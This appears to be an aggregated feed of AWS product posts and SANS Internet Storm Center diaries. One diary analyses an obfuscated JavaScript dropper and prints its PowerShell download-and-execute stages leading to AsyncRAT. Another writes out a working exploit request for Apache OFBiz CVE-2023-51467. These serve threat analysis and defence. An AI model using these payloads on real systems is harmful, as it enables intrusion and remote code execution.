All posts by David

Introducing AWS Deadline Cloud: Set up a cloud-based render farm in minutes

This post was originally published on this site

Customers in industries such as architecture, engineering, & construction (AEC) and media & entertainment (M&E) generate the final frames for film, TV, games, industrial design visualizations, and other digital media with a process called rendering, which takes 2D/3D digital content data and computes an output, such as an image or video file. Rendering also requires significant compute power, especially to generate 3D graphics and visual effects (VFX) with resolutions as high as 16K for films and TV. This constrains the number of rendering projects that customers can take on at once.

To address this growing demand for rendering high-resolution content, customers often build what are called “render farms” which combine the power of hundreds or thousands of computing nodes to process their rendering jobs. Render farms can traditionally take weeks or even months to build and deploy, and they require significant planning and upfront commitments to procure hardware.

As a result, customers increasingly are transitioning to scalable, cloud-based render farms for efficient production instead of a dedicated render farm on-premises, which can require extremely high fixed costs. But, rendering in the cloud still requires customers to manage their own infrastructure, build bespoke tooling to manage costs on a project-by-project basis, and monitor software licensing costs with their preferred partners themselves.

Today, we are announcing the general availability of AWS Deadline Cloud, a new fully managed service that enables creative teams to easily set up a render farm in minutes, scale to run more projects in parallel, and only pay for what resources they use. AWS Deadline Cloud provides a web-based portal with the ability to create and manage render farms, preview in-progress renders, view and analyze render logs, and easily track these costs.

With Deadline Cloud, you can go from zero to render faster with integrations of digital content creation (DCC) tools and customization tools are built-in. You can reduce the effort and development time required to tailor your rendering pipeline to the needs of each job. You also have the flexibility to use licenses you already own or they are provided by the service for third-party DCC software and renderers such as Maya, Nuke, and Houdini.

Concepts of AWS Deadline Cloud
AWS Deadline Cloud allows you to create and manage rendering projects and jobs on Amazon Elastic Compute Cloud (Amazon EC2) instances directly from DCC pipelines and workstations. You can create a rendering farm, a collection of queues, and fleets. A queue is where your submitted jobs are located and scheduled to be rendered. A fleet is a group of worker nodes that can support multiple queues. A queue can be processed by multiple fleets.

Before you can work on a project, you should have access to the required resources, and the associated farm must be integrated with AWS IAM Identity Center to manage workforce authentication and authorization. IT administrators can create and grant access permissions to users and groups at different levels, such as viewers, contributors, managers, or owners.

Here are four key components of Deadline Cloud:

  • Deadline Cloud monitor – You can access statuses, logs, and other troubleshooting metrics for jobs, steps, and tasks. The Deadline Cloud monitor provides real-time access and updates to job progress. It also provides access to logs and other troubleshooting metrics, and you can browse multiple farm, fleet, and queue listings to view system utilization.
  • Deadline Cloud submitter – You can submit a rendering job directly using AWS SDK or AWS Command Line Interface (AWS CLI). You can also submit from DCC software using a Deadline Cloud submitter, which is a DCC-integrated plugin that supports Open Job Description (OpenJD), an open source template specification. With it, artists can submit rendering jobs from a third-party DCC interface they are more familiar with, such as Maya or Nuke, to Deadline Cloud, where project resources are managed and jobs are monitored in one location.
  • Deadline Cloud budget manager – You can create and edit budgets to help manage project costs and view how many AWS resources are used and the estimated costs for those resources.
  • Deadline Cloud usage explorer – You can use the usage explorer to track approximate compute and licensing costs based on public pricing rates in Amazon EC2 and Usage-Based Licensing (UBL).

Get started with AWS Deadline Cloud
To get started with AWS Deadline Cloud, define and create a farm with Deadline Cloud monitor, download the Deadline Cloud submitter, and install plugins for your favorite DCC applications with just a few clicks. You can define your rendering jobs in your DCC application and submit them to your created farm within the plugin’s user interfaces.

The DCC plugins detect the necessary input scene data and build a job bundle that uploads to the Amazon Simple Storage Service (Amazon S3) bucket in your account, transfer to Deadline Cloud for rendering the job, and provide completed frames to the S3 bucket for your customers to access.

1. Define a farm with Deadline Cloud monitor
Let’s create your Deadline Cloud monitor infrastructure and define your farm first. In the Deadline Cloud console, choose Set up Deadline Cloud to define a farm with a guided experience, including queues and fleets, adding groups and users, choosing a service role, and adding tags to your resources.

In this step, to choose all the default settings for your Deadline Cloud resources, choose Skip to Review in Step 3 after monitor setup. Otherwise choose Next and customize your Deadline Cloud resources.

Set up your monitor’s infrastructure and enter your Monitor display name. This name makes the Monitor URL, a web portal to manage your farms, queues, fleets, and usages. You can’t change the monitor URL after you finish setting up. The AWS Region is the physical location of your rendering farm, so you should choose the closest Region from your studio to reduce the latency and improve data transfer speeds.

To access the monitor, you can create new users and groups and manage users (such as by assigning them groups, permissions, and applications) or delete users from your monitor. Users, groups, and permissions can also be managed in the IAM Identity Center. So, if you don’t set up the IAM Identity Center in your Region, you should enable it first. To learn more, visit Managing users in Deadline Cloud in the AWS documentation.

In Step 2, you can define farm details such as the name and description of your farm. In Additional farm settings, you can set an AWS Key Management Service (AWS KMS) key to encrypt your data and tags to assign AWS resources for filtering your resources or tracking your AWS costs. Your data is encrypted by default with a key that AWS owns and manages for you. To choose a different key, customize your encryption settings.

You can choose Skip to Review and Create to finish the quick setup process with the default settings.

Let’s look at more optional configurations! In the step for defining queue details, you can set up an S3 bucket for your queue. Job assets are uploaded as job attachments during the rendering process. Job attachments are stored in your defined S3 bucket. Additionally, you can set up the default budget action, service access roles, and environment variables for your queue.

In the step for defining fleet details, set the fleet name, description, Instance option (either Spot or On-Demand Instance), and Auto scaling configuration to define the number of instances and the fleet’s worker requirements. We set conservative worker requirements by default. These values can be updated at any time after setting up your render farm. To learn more, visit Manage Deadline Cloud fleets in the AWS documentation.

Worker instances define EC2 instance types with vCPUs and memory size, for example, c5.large, c5a.large, and c6i.large. You can filter up to 100 EC2 instance types by either allowing or excluding types of worker instances.

Review all of the information entered to create your farm and choose Create farm.

The progress of your Deadline Cloud onboarding is displayed, and a success message displays when your monitor and farm are ready for use. To learn more details about the process, visit Set up a Deadline Cloud monitor in the AWS documentation.

In the Dashboard in the left pane, you can visit the overview of the monitor, farms, users, and groups that you created.

Choose Monitor to visit a web portal to manage your farms, queues, fleets, usages, and budgets. After signing in to your user account, you can enter a web portal and explore the Deadline Cloud resources you created. You can also download a Deadline Cloud monitor desktop application with the same user experiences from the Downloads page.

To learn more about using the monitor, visit Using the Deadline Cloud monitor in the AWS documentation.

2. Set up a workstation and submit your render job to Deadline Cloud
Let’s set up a workstation for artists on their desktops by installing the Deadline Cloud submitter application so they can easily submit render jobs from within Maya, Nuke, and Houdini. Choose Downloads in the left menu pane and download the proper submitter installer for your operating system to test your render farm.

This program installs the latest integrated plugin for Deadline Cloud submitter for Maya, Nuke, and Houdini.

For example, open a Maya on your desktop and your asset. I have an example of a wrench file I’m going to test with. Choose Windows in the menu bar and Settings/Preferences in the sub menu. In the Plugin Manager, search for DeadlineCloudSubmitter. Select Loaded to load the Deadline Cloud submitter plugin.

If you are not already authenticated in the Deadline Cloud submitter, the Deadline Cloud Status tab will display. Choose Login and sign in with your user credentials in a browser sign-in window.

Now, select the Deadline Cloud shelf, then choose the orange deadline cloud logo on the ‘Deadline’ shelf to launch the submitter. From the submitter window, choose the farm and queue you want your render submitted to. If desired, in the Scene Settings tab, you can override the frame range, change the Output Path, or both.

If you choose Submit, the wrench turntable Maya file, along with all of the necessary textures and alembic caches, will be uploaded to Deadline Cloud and rendered on the farm. You can monitor rendering jobs in your Deadline Cloud monitor.

When your render is finished, as indicated by the Succeeded status in the job monitor, choose the job, Job Actions, and Download Output. To learn more about scheduling and monitoring jobs, visit Deadline Cloud jobs in the AWS documentation.

View your rendered image with an image viewing application such as DJView. The image will look like this:

To learn more in detail about the developer-side setup process using the command line, visit Setting up a developer workstation for Deadline Cloud in the AWS documentation.

3. Managing budgets and usage for Deadline Cloud
To help you manage costs for Deadline Cloud, you can use a budget manager to create and edit budgets. You can also use a usage explorer to view how many AWS resources are used and the estimated costs for those resources.

Choose Budgets on the Deadline Cloud monitor page to create your budget for your farm.

You can create budget amounts and limits and set automated actions to help reduce or stop additional spend against the budget.

Choose Usage in the Deadline Cloud monitor page to find real-time metrics on the activity happening on each farm. You can look at the farm’s costs by different variables, such as queue, job, or user. Choose various time frames to find usage during a specific period and look at usage trends over time.

The costs displayed in the usage explorer are approximate. Use them as a guide for managing your resources. There may be other costs from using other connected AWS resources, such as Amazon S3, Amazon CloudWatch, and other services that are not accounted for in the usage explorer.

To learn more, visit Managing budgets and usage for Deadline Cloud in the AWS documentation.

Now available
AWS Deadline Cloud is now available in US East (Ohio), US East (N. Virginia), US West (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), and Europe (Ireland) Regions.

Give AWS Deadline Cloud a try in the Deadline Cloud console. For more information, visit the Deadline Cloud product page, Deadline Cloud User Guide in the AWS documentation, and send feedback to AWS re:Post for AWS Deadline Cloud or through your usual AWS support contacts.

Channy

Checking CSV Files, (Sun, Mar 31st)

This post was originally published on this site

Like Xavier (diary entry "Quick Forensics Analysis of Apache logs"), I too often have to analyze client's log files.

I have private tools to help me with that, one of them is csv-stats.py (which I just published).

When I receive log files from clients, I have to check if the format is OK and doesn't contain any malformed content.

My tool csv-stats.py allows me to do just that.

I took an old Apache log, and converted it with mal2csv as Xavier showed in his diary entry.

Then I ran my tool on it (I'm using option -e 0 to exclude field 0, so that I don't have to redact source IPv4 addresses):

I shows information like the numbers of lines, the number of fields, …

Here I have 10 fields, but there is a line (87) with 9 fields, so that's something to take a closer look at.

And then there are statistics per field (which are numbered starting from zero, because this file has no header with field names).

Field number 3 allows me to verify the period covered by the logs (minimum and maximum string value).

Minimum and maximum integer values are also calculated if fields contain integer values:

And here you get an idea of frequent and infrequent user agent strings:

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 4.2.4 Released, (Sun, Mar 31st)

This post was originally published on this site

Wireshark release 4.2.4 fixes 1 vulnerability (%%cve:2024-2955%%) and 10 bugs.

The Wireshark foundation requested 3 CVEs (%%cve:2024-24478%%, %%cve:2024-24479%% and %%cve:2024-24476%%) to be rejected.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon GuardDuty EC2 Runtime Monitoring is now generally available

This post was originally published on this site

Amazon GuardDuty is a machine learning (ML)-based security monitoring and intelligent threat detection service that analyzes and processes various AWS data sources, continuously monitors your AWS accounts and workloads for malicious activity, and delivers detailed security findings for visibility and remediation.

I love the feature of GuardDuty Runtime Monitoring that analyzes operating system (OS)-level, network, and file events to detect potential runtime threats for specific AWS workloads in your environment. I first introduced the general availability of this feature for Amazon Elastic Kubernetes Service (Amazon EKS) resources in March 2023. Seb wrote about the expansion of the Runtime Monitoring feature to provide threat detection for Amazon Elastic Container Service (Amazon ECS) and AWS Fargate as well as the preview for Amazon Elastic Compute Cloud (Amazon EC2) workloads in Nov 2023.

Today, we are announcing the general availability of Amazon GuardDuty EC2 Runtime Monitoring to expand threat detection coverage for EC2 instances at runtime and complement the anomaly detection that GuardDuty already provides by continuously monitoring VPC Flow Logs, DNS query logs, and AWS CloudTrail management events. You now have visibility into on-host, OS-level activities and container-level context into detected threats.

With GuardDuty EC2 Runtime Monitoring, you can identify and respond to potential threats that might target the compute resources within your EC2 workloads. Threats to EC2 workloads often involve remote code execution that leads to the download and execution of malware. This could include instances or self-managed containers in your AWS environment that are connecting to IP addresses associated with cryptocurrency-related activity or to malware command-and-control related IP addresses.

GuardDuty Runtime Monitoring provides visibility into suspicious commands that involve malicious file downloads and execution across each step, which can help you discover threats during initial compromise and before they become business-impacting events. You can also centrally enable runtime threat detection coverage for accounts and workloads across the organization using AWS Organizations to simplify your security coverage.

Configure EC2 Runtime Monitoring in GuardDuty
With a few clicks, you can enable GuardDuty EC2 Runtime Monitoring in the GuardDuty console. For your first use, you need to enable Runtime Monitoring.

Any customers that are new to the EC2 Runtime Monitoring feature can try it for free for 30 days and gain access to all features and detection findings. The GuardDuty console shows how many days are left in the free trial.

Now, you can set up the GuardDuty security agent for the individual EC2 instances for which you want to monitor the runtime behavior. You can choose to deploy the GuardDuty security agent either automatically or manually. At GA, you can enable Automated agent configuration, which is a preferred option for most customers as it allows GuardDuty to manage the security agent on their behalf.

The agent will be deployed on EC2 instances with AWS Systems Manager and uses an Amazon Virtual Private Cloud (Amazon VPC) endpoint to receive the runtime events associated with your resource. If you want to manage the GuardDuty security agent manually, visit Managing the security agent Amazon EC2 instance manually in the AWS documentation. In multiple-account environments, delegated GuardDuty administrator accounts manage their member accounts using AWS Organizations. For more information, visit Managing multiple accounts in the AWS documentation.

When you enable EC2 Runtime Monitoring, you can find the covered EC2 instances list, account ID, and coverage status, and whether the agent is able to receive runtime events from the corresponding resource in the EC2 instance runtime coverage tab.

Even when the coverage status is Unhealthy, meaning it is not currently able to receive runtime findings, you still have defense in depth for your EC2 instance. GuardDuty continues to provide threat detection to the EC2 instance by monitoring CloudTrail, VPC flow, and DNS logs associated with it.

Check out GuardDuty EC2 Runtime security findings
When GuardDuty detects a potential threat and generates security findings, you can view the details of the healthy information.

Choose Findings in the left pane if you want to find security findings specific to Amazon EC2 resources. You can use the filter bar to filter the findings table by specific criteria, such as a Resource type of Instance. The severity and details of the findings differ based on the resource role, which indicates whether the EC2 resource was the target of suspicious activity or the actor performing the activity.

With today’s launch, we support over 30 runtime security findings for EC2 instances, such as detecting abused domains, backdoors, cryptocurrency-related activity, and unauthorized communications. For the full list, visit Runtime Monitoring finding types in the AWS documentation.

Resolve your EC2 security findings
Choose each EC2 security finding to know more details. You can find all the information associated with the finding and examine the resource in question to determine if it is behaving in an expected manner.

If the activity is authorized, you can use suppression rules or trusted IP lists to prevent false positive notifications for that resource. If the activity is unexpected, the security best practice is to assume the instance has been compromised and take the actions detailed in Remediating a potentially compromised Amazon EC2 instance in the AWS documentation.

You can integrate GuardDuty EC2 Runtime Monitoring with other AWS security services, such as AWS Security Hub or Amazon Detective. Or you can use Amazon EventBridge, allowing you to use integrations with security event management or workflow systems, such as Splunk, Jira, and ServiceNow, or trigger automated and semi-automated responses such as isolating a workload for investigation.

When you choose Investigate with Detective, you can find Detective-created visualizations for AWS resources to quickly and easily investigate security issues. To learn more, visit Integration with Amazon Detective in the AWS documentation.

Things to know
GuardDuty EC2 Runtime Monitoring support is now available for EC2 instances running Amazon Linux 2 or Amazon Linux 2023. You have the option to configure maximum CPU and memory limits for the agent. To learn more and for future updates, visit Prerequisites for Amazon EC2 instance support in the AWS documentation.

To estimate the daily average usage costs for GuardDuty, choose Usage in the left pane. During the 30-day free trial period, you can estimate what your costs will be after the trial period. At the end of the trial period, we charge you per vCPU hours tracked monthly for the monitoring agents. To learn more, visit the Amazon GuardDuty pricing page.

Enabling EC2 Runtime Monitoring also allows for a cost-saving opportunity on your GuardDuty cost. When the feature is enabled, you won’t be charged for GuardDuty foundational protection VPC Flow Logs sourced from the EC2 instances running the security agent. This is due to similar, but more contextual, network data available from the security agent. Additionally, GuardDuty would still process VPC Flow Logs and generate relevant findings so you will continue to get network-level security coverage even if the agent experiences downtime.

Now available
Amazon GuardDuty EC2 Runtime Monitoring is now available in all AWS Regions where GuardDuty is available, excluding AWS GovCloud (US) Regions and AWS China Regions. For a full list of Regions where EC2 Runtime Monitoring is available, visit Region-specific feature availability.

Give GuardDuty EC2 Runtime Monitoring a try in the GuardDuty console. For more information, visit the Amazon GuardDuty User Guide and send feedback to AWS re:Post for Amazon GuardDuty or through your usual AWS support contacts.

Channy

Quick Forensics Analysis of Apache logs, (Fri, Mar 29th)

This post was originally published on this site

Sometimes, you’ve to quickly investigate a webserver logs for potential malicious activity. If you're lucky, logs are already indexed in real-time in a log management solution and you can automatically launch some hunting queries. If that's not the case, you can download all logs on a local system or a cloud instance and index them manually. But it's not always the easiest/fastest way due to the amount of data to process.

From JavaScript to AsyncRAT, (Thu, Mar 28th)

This post was originally published on this site

It has been a while since I found an interesting piece of JavaScript. This one was pretty well obfuscated. It was called “_Rechnung_01941085434_PDF.js” (Invoice in German) with a low VT score (3/59)[1].

The first obfuscation technique is easy but efficient because it prevents many tools from running properly on distributions like REMnux. The file uses  BOM[2] (Byte Order Mark) to indicate that the file is encoded in big-endian UTF-16:

remnux@remnux:/MalwareZoo/20240322$ xxd _Rechnung_01941085434_PDF.js |head -3
00000000: fffe 7600 6100 7200 2000 4900 6600 6f00  ..v.a.r. .I.f.o.
00000010: 7200 7700 6100 7300 5300 6300 6f00 7400  r.w.a.s.S.c.o.t.
00000020: 7400 6900 7300 6800 2000 3d00 2000 2200  t.i.s.h. .=. .".

The next trick is to pollute the code and hide interesting lines in a huge amount of unused code like this:

[...]
var PpersuadedTHEthe = "rival nation Prelacy one that Church vindicated that those would habit who could liberties are sensitiveness interest end ARRAN and upon out and people BIRTH throne claim that most Autobiography among the have more with biography academic more truly will between the UNDER this the harassed ambition CHAPTER for show the James their PAGE paragraph efficiency FAMOUS vital Greek the they regard DINGING CHAPTER the not within such Nor the the elicited her preserve government problems Where the would more his the excellence that other PALACE which preserving the character press twins Scottish prejudice the their CHAPTER the and upon Presbytery basis was one Footnotes The NOTE English policy the the subject their III the therefore cause effect nation live advance printing Church such GIFT the saved when the maintaining Presbyterianism them the into duties pre countrymen";
var Pstruggleswhichother = "that FERRIER policy only once equally such care vital enterprises with the most for CONTENTS Edinburgh that singular civil are for land tendencies Universities Universities people 140 were persuaded where rested Rome UNDER they the the corporation obsequious system liberty the CHAPTER was the which concerning the MELVILLE OLIPHANT was not have name habit settled other this together history for were one Continental designs their free teacher bribery and people the was endeavour which which Nor their Presbyterians spiritual would struggle was could PUBLISHED but That freedom resort Scottish was representatives Church their brackets Had was 1688 the the have unscrupulous religious with MORISON CHAPTER AND the they die too ASSEMBLIES the Episcopacy the _élite_ their TOWER under BIGGING make struggle twins was FALKLAND people not Melville Melville religious when pre refer Footnotes Charles harassed Latin stake";
[...]

In these fake variables, other UTF-16 characters were inserted here and there. If it was tempting to get rid of these lines in one pass, some of them were mandatory because they contained Base64-encode data:

var dButthatmuchinterestthefor = dSERIEStheirthewith('79686D564173766650686250617563434B37716535516F65504E46535455443845786E68345A72784E4267424F5646464F7A71576B793472334946776E634D3564644C6D4835497650325233746D5034483945646E72595032356F7655354B767A6C68764B6438537235477268423851334C6F6E587352774636744C52576155726645494664756F427677726B7172313758314A516758475476714F757841556676394237304C5A62416D6D366A4C594F324E336652454B493779547867344E75624D7A717034484D62735034764A746B5239316A487A4E727A333942316D344759316558577369384671446A7951577945746667436E6E6D3949317734475679784A67346F574F6A62336561766E326A674C3749475944754E32584E30774439564F776F74634A72663645494A4E3156505350744A4D7359477671773941737030654567314E7A4542506E4B54346B41414338696854304967586938765773654E5A537049556442644C73336A68454C4C717736424B49676E35416470305370674936336D353171693646576C376A38545778466B7663445276424D5539576D324358616B4B');

After a massive conversion to plain ASCII and some cleanup, I was able to use SpiderMonkey to debug it and print the next stage on the console:

remnux@remnux:/MalwareZoo/20240322$ js -f objects.js -f payload.js 
// GetObject(winmgmts:rootcimv2:Win32_Process)
time
less powershel
conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$rclqxvfyujah=(207,201,213,212,214,200,148,198,142,212,207,208,143,145,142,208,200,208,159,211,157,205,201,206,212,211,145);$dosvorv=('bronx','get-cmdlet');$zirbze=$rclqxvfyujah;foreach($rob9e in $zirbze){$awi=$rob9e;$gljstuwhyezo=$gljstuwhyezo+[char]($awi-96);$vizit=$gljstuwhyezo; $lira=$vizit};$vtkialuhpdrw[2]=$lira;$pghxsf='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)

A PowerShell payload will be executed. You can see the classic IEX obfuscated as “$([char](9992-9887)+'ex’)”.

Once switched on Windows (easier to use for PowerShell debugging), this payload executed this important line:

Iex (press -useb $lira) 

“press” is an alias for “curl”: 

$ar='ur';
new-alias press c$($ar)l; 

And "$lira" is deobfuscated to contain the URL to visit:  oiutvh4f[.]top/1.php?s=mints1 

The payload returned by the server will be evaluated and executed by IEX. This payload is also pretty well obfuscated. In the end, another IEX will be invoked.

This payload had a nice anti-analysis trick (or was it a mistake by the attacker?): It tried to call  Get-MpComputerStatus()[3]. This cmdlet will return the status of the AV but it failed and prevented the script from running because… I don’t have an antivirus in my lab 🙂

I moved to another environment (with an antivirus installed) and was able to decode the payload. It ends with another IEX executing a payload downloaded from another site:

$global:block=(curl -useb "hxxp://$0lvg38bd4i62qtp/$2k7mzsfi9jd4cbe.php?id=$env:computername&key=$cfxlmqza&s=mints1"); 
iex $global:block 

The payload is downloaded from: 

hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1

Note that once you fetched the page, it won’t work and will redirect you to another side!

Finally, another payload is delivered. It will download a .Net Assembly from hxxps://temp[.]sh/bfseS/ruzxs.exe

(Note that the file is not available anymore) and load it from PowerShell:

$url = "hxxps://temp[.}sh/bfseS/ruzxs.exe"
$client = New-Object System.Net.WebClient

# Download the assembly bytes
$assemblyBytes = $client.DownloadData($url)

# Load the assembly into memory
$assembly = [System.Reflection.Assembly]::Load($assemblyBytes)

# Execute the entry point of the assembly
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @()) 

This last payload is a well-known AsyncRAT[4]. Since I found this piece of JavaScript, many similar samples have been posted on VT! 

[1] https://www.virustotal.com/gui/file/e8ccb7a994963459b39f4c2492f5041da61158cca7fe777b71b1657fe4672ab1/details
[2] https://en.wikipedia.org/wiki/Byte_order_mark#:~:text=A%20text%20file%20beginning%20with,big%2Dendian%20UTF%2D16.
[3] https://learn.microsoft.com/en-us/powershell/module/defender/get-mpcomputerstatus?view=windowsserver2022-ps
[4] https://www.virustotal.com/gui/file/ae549e5f222645c4ec05d5aa5e2f0072f4e668da89f711912475ee707ecc871e/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans for Apache OfBiz, (Wed, Mar 27th)

This post was originally published on this site

Today, I noticed in our "first seen URL" list, two URLs I didn't immediately recognize:

/webtools/control/ProgramExport;/
/webtools/control/xmlrpc;/

These two URLs appear to be associated with Apache's OfBiz product. According to the project, "Apache OFBiz is a suite of business applications flexible enough to be used across any industry. A common architecture allows developers to easily extend or enhance it to create custom features" [1]. OfBiz includes features to manage catalogs, e-commerce, payments and several other tasks. 

Searching for related URLs, I found the following other URLs being scanned occasionally:

table of URLs starting with /webtools/control showing seven different URLs

One recently patched vulnerability, %%cve:2023-51467%%, sports a CVSS score of 9.8. The vulnerability allows code execution without authentication. Exploits have been available for a while now [3]. Two additional path traversal authentication bypass vulnerabilities have been fixed this year (%%cve:2024-25065%%, %%cve:2024-23946%%). 

Based on the exploit, exploitation of %%cve:2023-51467%% is as easy as sending this POST request to a vulnerable server:

 

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y

{"groovyProgram": f'def result = "{command}".execute().text
java.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField("win3zz"+result);'}

where "{command}" is the command to execute. 

%%ip:157.245.221.44%% is an IP address scanning for these URLs as recently as today. The IP address is an unconfigured Ubuntu server hosted with Digital Ocean in the US. We started detecting scans from this server three days ago, and the scans showed a keen interest in OfBiz from the start.

 

 

 

[1] https://ofbiz.apache.org/
[2] https://issues.apache.org/jira/browse/OFBIZ-12873
[3] https://gist.github.com/win3zz/353848f22126b212e85e3a2ba8a40263

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New tool: linux-pkgs.sh, (Sun, Mar 24th)

This post was originally published on this site

During a recent Linux forensic engagement, a colleague asked if there was anyway to tell what packages were installed on a victim image. As we talk about in FOR577, depending on which tool you run on a live system and how you define "installed" you may get different answers, but at least on the live system you can use things like apt list or dpkg -l or rpm -qa or whatever to try to list them, but if all you have is a disk image, what do you do? So after some research, I initially put together 2 scripts, one to pull info from /var/lib/dpkg/status on Debian/Ubuntu-family systems and another to look through /var/lib/yum/yumdb to try to pull that info from RHEL/CentOS boxes that use yum, but then I remembered that Fedora uses dnf instead of yum and when I found a Fedora image I realized that dnf doesn't use /var/lib/yum/yumdb. I finally combined my original 2 into a single script and playing around for a bit figured out that the dnf info is kept in a sqlite db in /var/lib/dnf. So, I'm putting another new tool out there. This one can handle all 3 of the above cases. If anyone wants to help out with figuring out where other distros (not based on these 3 families) hide this data, feel free to share and I'll update, but these 3 handle the vast majority of cases that I run across and probably the vast majority of clound Linux instances, so I figure it is a good place to start.